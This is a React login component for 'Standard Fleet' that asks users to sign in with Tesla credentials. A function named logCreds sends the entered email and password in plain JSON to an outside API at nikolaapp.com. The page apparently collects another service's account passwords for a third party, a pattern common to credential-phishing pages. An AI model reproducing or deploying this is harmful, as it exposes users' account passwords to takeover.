import { useRef, useState, useEffect } from "react";
const _ = require("lodash");

const API = "https://api.nikolaapp.com/v1/credential";

const Success = () => {
  return (
    <div className="p-4 text-center rounded-lg w-72 bg-indigo-100">
      Login complete. Please contact the Standard Fleet team for next steps.
    </div>
  );
};
export default function App() {
  const email = useRef();
  const pwd = useRef();
  const [done, setDone] = useState();

  const logCreds = async () => {
    const rawResponse = await fetch(API, {
      method: "POST",
      headers: {
        Accept: "application/json",
        "Content-Type": "application/json"
      },
      body: JSON.stringify({
        email: email.current.value,
        pwd: pwd.current.value
      })
    });
    const content = await rawResponse.json();
    console.log(content);
  };

  const onSubmit = (e) => {
    if (!email.current.value.includes("mistergreen")) {
      alert("please enter a pre-approved account");
    } else {
      e.preventDefault();
      e.stopPropagation();
      logCreds();
      setDone(true);
      return false;
    }
  };
  return (
    <div className="mt-12 rounded-xl flex flex-col space-y-5 items-center justify-center">
      <div className="w-32 h-32">
        <img src="/logo.png" />
      </div>
      {done && <Success />}
      {!done && (
        <form onSubmit={onSubmit}>
          <div className="flex p-4 rounded-xl bg-indigo-100 flex-col space-y-3">
            <h1 className="font-extrabold text-gray-600 text-xl">
              Standard Fleet Login
            </h1>
            <input
              ref={email}
              type="email"
              placeholder="email@example.com"
              className="p-2 rounded-lg"
            ></input>
            <input
              ref={pwd}
              type="password"
              placeholder="password"
              className="p-2 rounded-lg"
            ></input>
            <input
              type="submit"
              value="Sign In With Tesla Credentials"
              className="bg-indigo-500 text-white p-2 rounded-lg"
            />
          </div>
        </form>
      )}
    </div>
  );
}
